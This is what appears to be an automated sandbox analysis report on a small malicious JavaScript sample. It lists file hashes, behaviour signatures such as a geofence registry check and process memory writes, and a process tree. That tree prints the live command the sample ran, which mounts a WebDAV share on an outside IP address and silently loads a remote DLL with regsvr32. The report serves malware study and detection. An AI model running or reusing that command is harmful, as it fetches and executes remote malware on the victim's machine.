Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 05:29
Static task
static1
Behavioral task
behavioral1
Sample
29260317979016427.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
29260317979016427.js
Resource
win10v2004-20240709-en
General
-
Target
29260317979016427.js
-
Size
4KB
-
MD5
8a33a35be531e436549a97eb9e5855fc
-
SHA1
4a87c14fd6a5881bf6e543f5fcf25b5246bf8f97
-
SHA256
f7c6e0269dd929ea1d8f8c7a0a814544dd643a003afa2b5be2b939835651f7e9
-
SHA512
c44223706d08e9b617d026b60ed076cf516ab37170808dc07747be03096438bea407378aaa4eda635b34f31982c604f5ec75dc6ec3312461e2666aec0876535c
-
SSDEEP
96:fB69vgpvgFbgXfQi1Z8VZMb6ekG6BAyxeVVVdK/fIoNpBXNCBz95SMZN90gWjNpy:H60LUX6Akb6C
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4996 wrote to memory of 2376 4996 wscript.exe 84 PID 4996 wrote to memory of 2376 4996 wscript.exe 84 PID 2376 wrote to memory of 3952 2376 cmd.exe 86 PID 2376 wrote to memory of 3952 2376 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\29260317979016427.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\2340278325458.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3952
-
-